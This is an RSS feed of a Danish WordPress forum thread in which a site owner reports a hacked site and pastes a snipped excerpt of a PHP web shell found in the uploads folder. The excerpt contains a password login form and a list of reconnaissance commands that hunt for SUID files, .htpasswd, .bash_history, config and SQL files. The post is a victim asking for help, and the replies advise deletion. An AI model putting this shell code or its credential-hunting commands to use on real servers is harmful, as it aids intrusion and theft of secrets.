<?xml version="1.0" encoding="UTF-8"?>
<!-- generator="bbPress/1.0.1" -->
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
		<title>WordPress DK Forum Topic: WP hacked</title>
		<link>http://wp-danmark.dk/forum/topic/wp-hacked</link>
		<description>WordPress DK Forum Topic: WP hacked</description>
		<language>da-DK</language>
		<pubDate>Sat, 18 Jul 2026 09:17:12 +0000</pubDate>
		<generator>http://bbpress.org/?v=1.0.1</generator>
		<textInput>
			<title><![CDATA[Søg]]></title>
			<description><![CDATA[Search all topics from these forums.]]></description>
			<name>q</name>
			<link>http://wp-danmark.dk/forum/search.php</link>
		</textInput>
		<atom:link href="http://wp-danmark.dk/forum/rss/topic/wp-hacked" rel="self" type="application/rss+xml" />

		<item>
			<title>Henning om "WP hacked"</title>
			<link>http://wp-danmark.dk/forum/topic/wp-hacked#post-54739</link>
			<pubDate>man, 27 jan 2014 22:36:55 +0000</pubDate>
			<dc:creator>Henning</dc:creator>
			<guid isPermaLink="false">54739@http://wp-danmark.dk/forum/</guid>
			<description>&#60;p&#62;Se evt. her:&#60;br /&#62;
&#60;a href=&#34;http://sitecheck.sucuri.net/results/cetina.dk&#34; rel=&#34;nofollow&#34;&#62;http://sitecheck.sucuri.net/results/cetina.dk&#60;/a&#62;
&#60;/p&#62;</description>
		</item>
		<item>
			<title>jgrevang om "WP hacked"</title>
			<link>http://wp-danmark.dk/forum/topic/wp-hacked#post-54736</link>
			<pubDate>man, 27 jan 2014 22:12:57 +0000</pubDate>
			<dc:creator>jgrevang</dc:creator>
			<guid isPermaLink="false">54736@http://wp-danmark.dk/forum/</guid>
			<description>&#60;p&#62;Cetina.dk
&#60;/p&#62;</description>
		</item>
		<item>
			<title>John om "WP hacked"</title>
			<link>http://wp-danmark.dk/forum/topic/wp-hacked#post-54735</link>
			<pubDate>man, 27 jan 2014 21:06:51 +0000</pubDate>
			<dc:creator>John</dc:creator>
			<guid isPermaLink="false">54735@http://wp-danmark.dk/forum/</guid>
			<description>&#60;p&#62;Hvilket domæne drejer det sig om ?
&#60;/p&#62;</description>
		</item>
		<item>
			<title>Henning om "WP hacked"</title>
			<link>http://wp-danmark.dk/forum/topic/wp-hacked#post-54731</link>
			<pubDate>man, 27 jan 2014 17:42:11 +0000</pubDate>
			<dc:creator>Henning</dc:creator>
			<guid isPermaLink="false">54731@http://wp-danmark.dk/forum/</guid>
			<description>&#60;p&#62;Slet i en fart - det har intet med din WP at gøre !!!!!!
&#60;/p&#62;</description>
		</item>
		<item>
			<title>jgrevang om "WP hacked"</title>
			<link>http://wp-danmark.dk/forum/topic/wp-hacked#post-54730</link>
			<pubDate>man, 27 jan 2014 17:21:02 +0000</pubDate>
			<dc:creator>jgrevang</dc:creator>
			<guid isPermaLink="false">54730@http://wp-danmark.dk/forum/</guid>
			<description>&#60;p&#62;Hej&#60;/p&#62;
&#60;p&#62;Vores side er iff. Google blevet hacked og i Wordpress' rod var flere dirs tilhørende forskellige fremmede domæner.&#60;br /&#62;
Jeg har slettet omtalte dirs og ledt systematisk efter php-filer med kode, der ikke skal være der.&#60;br /&#62;
I  diret uploads findes en php-fil med bl.a. følgende kode:&#60;/p&#62;
&#60;p&#62;/..snip&#60;/p&#62;
&#60;p&#62; function wpLicense2($i){$a=Array('WPluginstripslashes',&#34;&#38;lt;pre align=center&#38;gt;&#38;lt;form method=post&#38;gt;Password: &#38;lt;input type=password name=pass&#38;gt;&#38;lt;input type=submit value='&#38;gt;&#38;gt;'&#38;gt;&#38;lt;/form&#38;gt;&#34;,'pass','pass','HTTP_HOST','HTTP_HOST','HTTP_HOST',&#34;win&#34;,'win','nix','safe_mode','disable_functions','c','c','win',&#34;\\&#34;,&#34;/&#34;,&#34;\\&#34;,&#34;/&#34;,'/','/','HTTP_HOST','ajax','HTTP_HOST','ajax','win',&#34;List Directory&#34;,&#34;dir&#34;,&#34;Find index.php in current dir&#34;,&#34;dir /s /w /b index.php&#34;,&#34;Find *config*.php in current dir&#34;,&#34;dir /s /w /b *config*.php&#34;,&#34;Show active connections&#34;,&#34;netstat -an&#34;,&#34;Show running services&#34;,&#34;net start&#34;,&#34;User accounts&#34;,&#34;net user&#34;,&#34;Show computers&#34;,&#34;net view&#34;,&#34;ARP Table&#34;,&#34;arp -a&#34;,&#34;IP Configuration&#34;,&#34;ipconfig /all&#34;,&#34;List dir&#34;,&#34;ls -lha&#34;,&#34;list file attributes on a Linux second extended file system&#34;,&#34;lsattr -va&#34;,&#34;show opened ports&#34;,&#34;netstat -an &#124; grep -i listen&#34;,&#34;process status&#34;,&#34;ps aux&#34;,&#34;Find&#34;,&#34;&#34;,&#34;find all suid files&#34;,&#34;find / -type f -perm -04000 -ls&#34;,&#34;find suid files in current dir&#34;,&#34;find . -type f -perm -04000 -ls&#34;,&#34;find all sgid files&#34;,&#34;find / -type f -perm -02000 -ls&#34;,&#34;find sgid files in current dir&#34;,&#34;find . -type f -perm -02000 -ls&#34;,&#34;find config.inc.php files&#34;,&#34;find / -type f -name config.inc.php&#34;,&#34;find config* files&#34;,&#34;find / -type f -name \&#34;config*\&#34;&#34;,&#34;find config* files in current dir&#34;,&#34;find . -type f -name \&#34;config*\&#34;&#34;,&#34;find all writable folders and files&#34;,&#34;find / -perm -2 -ls&#34;,&#34;find all writable folders and files in current dir&#34;,&#34;find . -perm -2 -ls&#34;,&#34;find all service.pwd files&#34;,&#34;find / -type f -name service.pwd&#34;,&#34;find service.pwd files in current dir&#34;,&#34;find . -type f -name service.pwd&#34;,&#34;find all .htpasswd files&#34;,&#34;find / -type f -name .htpasswd&#34;,&#34;find .htpasswd files in current dir&#34;,&#34;find . -type f -name .htpasswd&#34;,&#34;find all .bash_history files&#34;,&#34;find / -type f -name .bash_history&#34;,&#34;find .bash_history files in current dir&#34;,&#34;find . -type f -name .bash_history&#34;,&#34;find all .fetchmailrc files&#34;,&#34;find / -type f -name .fetchmailrc&#34;,&#34;find .fetchmailrc files in current dir&#34;,&#34;find . -type f -name .fetchmailrc&#34;,&#34;Locate&#34;,&#34;&#34;,&#34;locate httpd.conf files&#34;,&#34;locate httpd.conf&#34;,&#34;locate vhosts.conf files&#34;,&#34;locate vhosts.conf&#34;,&#34;locate proftpd.conf files&#34;,&#34;locate proftpd.conf&#34;,&#34;locate psybnc.conf files&#34;,&#34;locate psybnc.conf&#34;,&#34;locate my.conf files&#34;,&#34;locate my.conf&#34;,&#34;locate admin.php files&#34;,&#34;locate admin.php&#34;,&#34;locate cfg.php files&#34;,&#34;locate cfg.php&#34;,&#34;locate conf.php files&#34;,&#34;locate conf.php&#34;,&#34;locate config.dat files&#34;,&#34;locate config.dat&#34;,&#34;locate config.php files&#34;,&#34;locate config.php&#34;,&#34;locate config.inc files&#34;,&#34;locate config.inc&#34;,&#34;locate config.inc.php&#34;,&#34;locate config.inc.php&#34;,&#34;locate config.default.php files&#34;,&#34;locate config.default.php&#34;,&#34;locate config* files &#34;,&#34;locate config&#34;,&#34;locate .conf files&#34;,&#34;locate '.conf'&#34;,&#34;locate .pwd files&#34;,&#34;locate '.pwd'&#34;,&#34;locate .sql files&#34;,&#34;locate '.sql'&#34;,&#34;locate .htpasswd files&#34;,&#34;locate '.htpasswd'&#34;,&#34;locate .bash_history files&#34;,&#34;locate '.bash_history'&#34;,&#34;locate .mysql_history files&#34;,&#34;locate '.mysql_history'&#34;,&#34;locate .fetchmailrc files&#34;,&#34;locate '.fetchmailrc'&#34;,&#34;locate backup files&#34;,&#34;locate backup&#34;,&#34;locate dump files&#34;,&#34;locate dump&#34;,&#34;locate priv files&#34;,&#34;locate priv&#34;,'charset','charset','wpplugin_charset',&#34;&#38;lt;html&#38;gt;&#38;lt;head&#38;gt;&#38;lt;meta http-equiv='Content-Type' content='text/html; charset=&#34;,'charset',&#34;'&#38;gt;&#38;lt;title&#38;gt;&#34;,'HTTP_HOST',&#34; - WPlugin &#34;,'cwd',&#34;';&#60;/p&#62;
&#60;p&#62;..snip/&#60;/p&#62;
&#60;p&#62;Mit spørgsmål er, om ikke denne kode fremskaffer oplysninger, der kan bruges til at hacke serveren?&#60;/p&#62;
&#60;p&#62;Mvh
&#60;/p&#62;</description>
		</item>

	</channel>
</rss>
